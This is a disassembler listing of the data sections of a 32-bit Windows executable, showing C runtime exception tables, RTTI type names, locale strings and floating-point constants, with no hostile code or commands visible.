dword_421728 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_404078+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_404135
align 8
dword_421748 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4044D2-1DEo
dd 0FFFFFF80h, 0
dd 0FFFFFFFEh, 4044B9h, 4044BDh, 0FFFFFFFEh, 40447Fh, 404493h
dword_421770 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_404D50+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_404DE8
align 10h
dword_421790 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405019+2o
db 0CCh
db 3 dup(0FFh)
align 10h
dd 0FFFFFFFEh, 0
dd offset sub_40517A
align 10h
dword_4217B0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405461+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 54h, 40h, 0
align 10h
dword_4217D0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405616+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4056C1
align 10h
dword_4217F0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405765+2o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40586E
dd 0FFFFFFFEh, 0
dd offset sub_40587A
dword_421818 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405CE4+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_405D9E
align 8
dword_421838 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407DBB+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset loc_407E71
align 8
dword_421858 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408305+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40836C
align 8
dword_421878 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408851+2o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40896B
align 8
dword_421898 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408B90+2o
dd 0FFFFFF8Ch, 0
dd 0FFFFFFFEh, 408DB9h, 408DBDh, 0
dword_4218B8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408E91+2o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_408F54
align 8
dword_4218D8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40902E+2o
db 0CCh
db 3 dup(0FFh)
align 8
dd 0FFFFFFFEh, 0
dd offset sub_4090FF
dd 2 dup(0)
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
align 2
dw 40h
dword_421900 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40A6FF+2o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40A7D1
align 10h
dword_421920 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B64B+2o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B70B
align 10h
dd offset loc_40B6CD
dd offset loc_40B6D7
dword_421948 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B771+2o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B7B4h, 40B7BDh, 40h, 2 dup(0)
dd offset sub_40B894
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 421964h
dword_421998 dd 19930522h, 2, 421974h, 1, 421984h, 3 dup(0) ; DATA XREF: .text:0041C90Fo
dd 1, 0
dword_4219C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B8AC+2o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B9CC
align 10h
dd offset loc_40B93C
dd offset loc_40B945
dword_4219E8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BA48+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40BBB3h, 40BBB7h, 0
dword_421A08 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BBC7+2o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BC4Ch, 40BC50h
dword_421A24 dd 0 ; DATA XREF: sub_40BDB6+162o
dd offset sub_40B57E
align 10h
dd offset dword_421A34
dword_421A34 dd 2, 421A40h, 421C9Ch, 0 ; DATA XREF: fabskl8p:00421A30o
dd offset off_423E50
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 40C10Ch, 0
dword_421A60 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40C208+2o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40C228h, 40C22Ch, 0
dword_421A80 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40C254+2o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40C278h, 40C27Ch, 0
dword_421AA0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CEC4+2o
db 0CCh
db 3 dup(0FFh)
align 10h
dd 0FFFFFFFEh, 40CF4Ah, 40CF61h, 0
dword_421AC0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D002+2o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40D048h, 40D05Ch, 0
dword_421AE0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D0F1+2o
db 0CCh
db 3 dup(0FFh)
align 10h
dd 0FFFFFFFEh, 0
dd offset sub_40D200
align 10h
dword_421B00 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D7D0+2o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40D8A2
align 10h
dword_421B20 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DCFF+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DDF6
align 10h
dword_421B40 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DE1D+2o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DF5B
align 10h
dword_421B60 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40E0D9+2o
dd 0FFFFFFC0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E247
align 10h
dword_421B80 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40E383+2o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E419
align 10h
dword_421BA0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40EA60+2o
db 0CCh
db 3 dup(0FFh)
align 10h
dd 0FFFFFFFEh, 0
dd offset sub_40EAF9
align 10h
dword_421BC0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F19E+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F230
align 10h
dword_421BE0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F260+2o
dd 0FFFFFFC8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F3F6
dd 2 dup(0)
dd offset sub_40F32D
dword_421C08 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F3FF+2o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F4D6
align 8
dword_421C28 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40FB3A+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40FB57h, 40FB73h, 0
dword_421C48 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_41048B+2o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 4104B8h, 4104D4h, 0
dd offset off_42740C
align 10h
dd 0FFFFFFFFh, 0
dd 28h, 4013CEh, 0
dd offset off_42742C
dd 0
dd 0FFFFFFFFh, 0
dd 28h, 4013E6h, 0
dd offset off_42744C
align 8
dd 0FFFFFFFFh, 0
dword_421CB0 dd 0Ch, 40303Eh, 3, 421C64h, 421C80h, 421C9Ch
; DATA XREF: fabskl8p:00421CD4o
dword_421CC8 dd 0 ; DATA XREF: sub_40121E+48o
; sub_4016BA+48o ...
dd offset loc_4010E1
dd 0
dd offset dword_421CB0+8
dd 0
dd offset off_427468
dd 0
dd 0FFFFFFFFh, 0
dword_421CEC dd 0Ch, 401637h, 2, 421CD8h, 421C9Ch ; DATA XREF: fabskl8p:00421D0Co
dword_421D00 dd 0 ; DATA XREF: sub_4015ED+34o
; sub_403417+54o
dd offset sub_401038
dd 0
dd offset dword_421CEC+8
dword_421D10 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_419F99+2o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 5 dup(0)
dd 0FFFFFFFFh, 41C97Ah
dword_421D40 dd 19930522h, 1, 421D38h, 5 dup(0) ; DATA XREF: .text:0041C995o
dd 1, 0FFFFFFFFh, 41C99Fh
dword_421D6C dd 19930522h, 1, 421D64h, 5 dup(0) ; DATA XREF: .text:0041C9BAo
dd 1, 0FFFFFFFFh, 41C9C4h
dword_421D98 dd 19930522h, 1, 421D90h, 5 dup(0) ; DATA XREF: .text:0041C9F5o
dd 1, 0FFFFFFFFh, 41C9FFh
dword_421DC4 dd 19930522h, 1, 421DBCh, 5 dup(0) ; DATA XREF: .text:0041CA2Ao
dd 1, 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 1, 0
dd 1, 0
dd 40h, 2 dup(0)
dd offset sub_40150F
dd 40h, 2 dup(0)
dd offset loc_40149D
dd 2 dup(2), 3, 1, 421E08h, 2 dup(0)
dd 3, 1, 421E18h
dword_421E50 dd 19930522h, 4, 421DE8h, 2, 421E28h, 3 dup(0) ; DATA XREF: sub_41C919+11o
dd 1, 0
dd 0FFFFFFFFh, 41C934h
dword_421E80 dd 19930522h, 1, 421E78h, 5 dup(0) ; DATA XREF: .text:0041C94Do
dd 1, 0
dd 0FFFFFFFFh, 41C957h
dword_421EB0 dd 19930522h, 1, 421EA8h, 5 dup(0) ; DATA XREF: .text:0041C970o
dd 1, 0
dd 0FFFFFFFFh, 41CA34h
dword_421EE0 dd 19930522h, 1, 421ED8h, 5 dup(0) ; DATA XREF: .text:0041CA4Do
dd 1, 0
dd 0FFFFFFFFh, 41CA57h
dword_421F10 dd 19930522h, 1, 421F08h, 5 dup(0) ; DATA XREF: .text:0041CA7Co
dd 1, 0
dd 0FFFFFFFFh, 41CA86h
dword_421F40 dd 19930522h, 1, 421F38h, 5 dup(0) ; DATA XREF: .text:0041CAB7o
dd 1, 0
dd 0FFFFFFFFh, 41CAC1h
dword_421F70 dd 19930522h, 1, 421F68h, 5 dup(0) ; DATA XREF: .text:0041CAECo
dd 1, 0
dd 0FFFFFFFFh, 41CAF6h
dword_421FA0 dd 19930522h, 1, 421F98h, 5 dup(0) ; DATA XREF: .text:0041CB21o
dd 1, 40Fh dup(0)
fabskl8p ends
; Section 3. (virtual address 00023000)
; Virtual size : 00014000 ( 81920.)
; Section size in file : 00014000 ( 81920.)
; Offset to raw data for section: 00023000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 423000h
dd offset dword_41D310
dd offset dword_41D310
off_423008 dd offset off_41D39C ; DATA XREF: fabskl8p:00420F4Co
; fabskl8p:00420F74o ...
align 10h
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
dd offset dword_41D310
dd offset dword_41D310
off_423030 dd offset off_41D39C ; DATA XREF: fabskl8p:00420FB0o
; fabskl8p:00420FD0o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
off_423048 dd offset dword_41D310 ; DATA XREF: sub_4033FE+3o
align 10h
dword_423050 dd 2 ; DATA XREF: sub_409E64+42r
; sub_40A004+19r ...
align 10h
dd offset sub_40B4CD
dword_423064 dd 0E65F02C3h ; DATA XREF: sub_401DA7+9r
; sub_401E4D+1Ar ...
dword_423068 dd 19A0FD3Ch ; DATA XREF: sub_404A3E+AEr
; sub_40B439+29w ...
align 10h
dword_423070 dd 0FFFFFFFFh, 16h dup(0) ; DATA XREF: sub_404B71+29o
; sub_404D50+63o ...
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 1Eh dup(0)
db 2 dup(0)
word_423182 dw 0 ; DATA XREF: sub_4428C8+6454o
dd 12h dup(0)
dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
dd 76757473h, 7A797877h, 0
db 0
align 2
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
align 4
dd 21h dup(0)
byte_423290 db 0 ; DATA XREF: sub_405019+102w
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h, 0
byte_423398 db 0 ; DATA XREF: sub_405019+11Ew
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_423498 dd 0A02980h ; DATA XREF: sub_402AEB+41r
; sub_404D50+4Cr ...
byte_42349C db 1 ; DATA XREF: sub_404E6E+E3r
db 2, 4, 8
dword_4234A0 dd 3A4h ; DATA XREF: sub_404E6E:loc_404EAAr
dword_4234A4 dd 82798260h ; DATA XREF: sub_404E6E+12Br
dd 21h, 0
dword_4234B0 dd 0DFA6h ; DATA XREF: sub_404E6E+C6r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dd offset dword_41DF50+4
dword_423594 dd 0FFFFFFFEh ; DATA XREF: sub_402AEB+2Cr
; sub_402AEB+4Cr ...
dword_423598 dd 43h, 0 ; DATA XREF: sub_4051D1:loc_4052CEo
; sub_405311:loc_40535Co ...
dword_4235A0 dd 2, 15h dup(0) ; DATA XREF: sub_405423+28o
; sub_405765+DAo ...
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd 2 dup(1), 3 dup(0)
dd offset off_423F38
dd 2 dup(0)
off_423668 dd offset asc_41DD50 ; DATA XREF: sub_40F52F+Dr
; sub_40F5AC+Dr ...
; " ((((( H"
dd offset dword_41E158+80h
dd offset dword_41E158+200h
dd offset off_423E78
off_423678 dd offset dword_4235A0 ; DATA XREF: sub_402AEB+24r
; sub_405461+4Er ...
dd 1
off_423680 dd offset dword_4235A0 ; DATA XREF: sub_40AA06+17o
dd offset dword_423070
dword_423688 dd 0Eh ; DATA XREF: sub_4054D7+13r
; sub_405543+13r ...
dword_42368C dd 0Dh ; DATA XREF: sub_4054D7+1r
; sub_4054D7+1Er ...
dword_423690 dd 1 ; DATA XREF: sub_405B48:loc_405B4Er
dword_423694 dd 16h ; DATA XREF: sub_405B48:loc_405B69r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4237F8 dd 0Ch ; DATA XREF: sub_405B83+9o
dword_4237FC dd 8 ; DATA XREF: sub_405B96+9o
off_423800 dd offset dword_427978 ; DATA XREF: sub_405C31:loc_405C6Ew
; sub_405C7A+8o ...
dword_423804 dd 1 ; DATA XREF: sub_405C31:loc_405C3Ar
dd offset dword_427990
dd 1, 2 dup(0)
dd offset dword_4279A8
dd 1, 4279C0h, 1, 2 dup(0)
dd offset dword_4279D8
dd 1, 4279F0h, 1, 427A08h, 1, 2 dup(0)
dd offset dword_427A20
dd 1, 2 dup(0)
dd offset dword_427A38
dd 1, 427A50h, 1, 427A68h, 1, 2 dup(0)
dd offset dword_427A80
dd 1, 427A98h, 1, 427AB0h, 1, 22h dup(0)
dword_423920 dd 10h ; DATA XREF: sub_405C7A+2Ao
; sub_405C7A+4Ao
off_423924 dd offset aNull_0 ; DATA XREF: sub_406D87:loc_407275r
; sub_406D87+7E7r
; "(null)"
off_423928 dd offset aNull ; DATA XREF: sub_406D87+433r
; "(null)"
align 10h
off_423930 dd offset sub_407E9A ; DATA XREF: sub_407C0D+Er
; sub_407EC9+45w
align 10h
dd offset dword_41D310
align 10h
off_423950 dd offset dword_435940 ; DATA XREF: sub_408434o
; sub_40843A+52o ...
align 8
dd offset dword_435940
dd 101h
dword_423960 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40843A+74o
dd 1000h, 4 dup(0)
dd 2, 0FFFFFFFEh, 6 dup(0)
dd 2, 0FFFFFFFEh, 7 dup(0)
dword_4239C0 dd 7Ch dup(0) ; DATA XREF: sub_40843A+A4o
dword_423BB0 dd 8 dup(0) ; DATA XREF: sub_40850B+Do
; sub_40855D+Do
dword_423BD0 dd 0FFFFFFFFh, 0A80h, 0Ah dup(0) ; DATA XREF: sub_4035D3:loc_40366Fo
; sub_4035D3:loc_4036B4o ...
dword_423C00 dd 2 ; DATA XREF: sub_409E64:loc_409E70r
off_423C04 dd offset aR6002FloatingP ; DATA XREF: sub_409E64:loc_409F94r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 41DAA4h, 9, 41DA78h, 0Ah, 41D9E0h, 10h, 41D9B4h
dd 11h, 41D984h, 12h, 41D960h, 13h, 41D934h, 18h, 41D8FCh
dd 19h, 41D8D4h, 1Ah, 41D89Ch, 1Bh, 41D864h, 1Ch, 41D83Ch
dd 1Eh, 41D81Ch, 1Fh, 41D7B8h, 20h, 41D780h, 21h, 41D688h
dd 22h, 41D5E8h, 78h, 41D5D8h, 79h, 41D5C8h, 7Ah, 41D5B8h
dd 0FCh, 41D5B4h, 0FFh, 41D5A4h
byte_423CB8 db 0 ; DATA XREF: sub_40A15D:loc_40A4BEr
; sub_40A15D+36Fr
align 4
dd 2Fh dup(0)
dd 8 dup(1010101h), 4 dup(2020202h), 2 dup(3030303h), 2 dup(0)
dword_423DB8 dd 1B3Fh ; DATA XREF: sub_40ACF3+Dr
align 10h
dword_423DC0 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_405616+1Do
; sub_405765+6Eo
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_423E38 dd 3 ; DATA XREF: sub_40ADC4+A1r
; sub_40ADC4+C0r ...
dword_423E3C dd 7 ; DATA XREF: sub_40ADC4+A7r
; sub_40ADC4+C6r ...
dd 78h
dword_423E44 dd 0Ah ; DATA XREF: sub_40ADC4+22r
; sub_40E098+4r
dd offset dword_41D310
dd offset sub_40B4CD
off_423E50 dd offset off_41D39C ; DATA XREF: sub_40BDB6+128o
; fabskl8p:00420FF8o ...
align 8
a_?avbad_except db '.?AVbad_exception@std@@',0
dd offset asc_41DD50 ; " ((((( H"
dd offset dword_41DF50+2
off_423E78 dd offset aSun ; DATA XREF: sub_4051D1+D9o
; .data:00423674o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset dword_41E158+300h
dd 409h, 2 dup(1), 423E78h
dword_423F34 dd 2Eh ; DATA XREF: .data:off_423F38o
off_423F38 dd offset dword_423F34 ; DATA XREF: sub_4051D1+14o
; sub_40CA74+Br ...
off_423F3C dd offset dword_427F78 ; DATA XREF: sub_40CA74+1Dr
off_423F40 dd offset dword_427F78 ; DATA XREF: sub_40CA74+2Fr
off_423F44 dd offset dword_427F78 ; DATA XREF: sub_40CAB4+Cr
off_423F48 dd offset dword_427F78 ; DATA XREF: sub_40CAB4+1Er
off_423F4C dd offset dword_427F78 ; DATA XREF: sub_40CAB4+30r
off_423F50 dd offset dword_427F78 ; DATA XREF: sub_40CAB4+42r
off_423F54 dd offset dword_427F78 ; DATA XREF: sub_40CAB4+54r
off_423F58 dd offset dword_427F78 ; DATA XREF: sub_40CAB4+66r
off_423F5C dd offset dword_427F78 ; DATA XREF: sub_40CAB4+78r
dd 2 dup(7F7F7F7Fh), 423F38h, 1, 2Eh, 1, 2 dup(0)
off_423F80 dd offset sub_4116FA ; DATA XREF: sub_40D94E:loc_40D952r
; sub_40FABC+5w
off_423F84 dd offset sub_410DF6 ; DATA XREF: sub_40FABC+Aw
off_423F88 dd offset sub_410DB4 ; DATA XREF: sub_40FABC+14w
off_423F8C dd offset sub_410DE8 ; DATA XREF: sub_40FABC+1Ew
off_423F90 dd offset word_410D5E ; DATA XREF: sub_40FABC+28w
off_423F94 dd offset sub_4116FA ; DATA XREF: sub_40FABC+32w
off_423F98 dd offset sub_411674 ; DATA XREF: sub_406D87+61Ar
; sub_40FABC+37w
off_423F9C dd offset sub_410D74 ; DATA XREF: sub_409217+5F1r
; sub_40FABC+41w
off_423FA0 dd offset sub_410CDE ; DATA XREF: sub_406D87+65Fr
; sub_40FABC+4Bw
off_423FA4 dd offset sub_410C6D ; DATA XREF: sub_406D87+640r
; sub_40FABC+55w
align 10h
dword_423FB0 dd 19930520h, 3 dup(0) ; DATA XREF: sub_40F004+2o
; sub_40F00D+2o
dword_423FC0 dd 2694h ; DATA XREF: sub_4101A5+3r
; sub_4101F8+5Dr
dd 9875h, 9873h, 0
dword_423FD0 dd 14h ; DATA XREF: sub_410107:loc_41010Fr
off_423FD4 dd offset aExp ; DATA XREF: sub_410107:loc_41017Fr
; "exp"
dd 1Dh, 41DC28h, 1Ah, 41DC18h, 1Bh, 41DC1Ch, 1Fh, 41EE20h
dd 13h, 41EE18h, 21h, 41EE10h, 0Eh, 41DC10h, 0Dh, 41DC08h
dd 0Fh, 41DBECh, 10h, 41EE08h, 5, 41EE00h, 1Eh, 41DBD0h
dd 12h, 41DBCCh, 20h, 41DBC8h, 0Ch, 41DBE4h, 0Bh, 41DBDCh
dd 15h, 41EDF8h, 1Ch, 41DBD4h, 19h, 41EDF0h, 11h, 41EDE8h
dd 18h, 41EDE0h, 16h, 41EDD8h, 17h, 41EDD0h, 22h, 41EDCCh
dd 23h, 41EDC8h, 24h, 41EDC4h, 25h, 41EDBCh, 26h, 41EDB0h
dbl_4240B8 dq 1.797693134862316e308 ; DATA XREF: sub_40FED1:loc_40FFA1r
; sub_40FED1:loc_40FFA9r
dd 0
dd 0FFF80000h
dbl_4240C8 dq 1.797693134862316e308 ; DATA XREF: sub_40FED1+89r
; sub_40FED1+A4r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_4240E0 dt 2.3562723457267347066e313 ; DATA XREF: sub_410435+Br
; sub_410435+1Er
align 4
tbyte_4240EC dt 1.9149954921904370718e-1233 ; DATA XREF: sub_410435+30r
align 4
dword_4240F8 dd 1 ; DATA XREF: sub_41048B+1Cr
; sub_41048B+4Cw
byte_4240FC db 3 ; DATA XREF: sub_41056E+1Br
; sub_41056E:loc_4105ACr
align 10h
dd 7080h, 1, 0FFFFF1F0h, 0
dword_424110 dd 545350h, 0Fh dup(0) ; DATA XREF: .data:00424190o
dword_424150 dd 544450h, 0Fh dup(0) ; DATA XREF: .data:00424194o
dd offset dword_424110
dd offset dword_424150
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch
dword_424218 dd 2 ; DATA XREF: sub_41088C+13r
; sub_41088C+4Fr ...
align 10h
dword_424220 dd 0FFFFFFFEh ; DATA XREF: sub_4117FA:loc_411813r
dword_424224 dd 0FFFFFFFEh ; DATA XREF: sub_41088C+1Br
; sub_41088C:loc_4108B5r ...
align 10h
dword_424230 dd 400h ; DATA XREF: sub_411D19:loc_4120BDr
; sub_411D19+44Dr
dword_424234 dd 0FFFFFC01h ; DATA XREF: sub_411D19:loc_411E88r
dword_424238 dd 35h ; DATA XREF: sub_411D19+78r
; sub_411D19+176r ...
dword_42423C dd 0Bh ; DATA XREF: sub_411D19:loc_412024r
; sub_411D19+3AAr ...
dword_424240 dd 40h ; DATA XREF: sub_411D19+519r
dword_424244 dd 3FFh ; DATA XREF: sub_411D19+452r
; sub_411D19:loc_41217Cr
dword_424248 dd 80h ; DATA XREF: sub_41225B:loc_4125FFr
; sub_41225B+44Dr
dword_42424C dd 0FFFFFF81h ; DATA XREF: sub_41225B:loc_4123CAr
dword_424250 dd 18h ; DATA XREF: sub_41225B+78r
; sub_41225B+176r ...
dword_424254 dd 8 ; DATA XREF: sub_41225B:loc_412566r
; sub_41225B+3AAr ...
dword_424258 dd 20h ; DATA XREF: sub_41225B+519r
dword_42425C dd 7Fh ; DATA XREF: sub_41225B+452r
; sub_41225B:loc_4126BEr
dword_424260 dd 2 dup(0) ; DATA XREF: sub_41279D+363o
; sub_412E61+18Eo
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
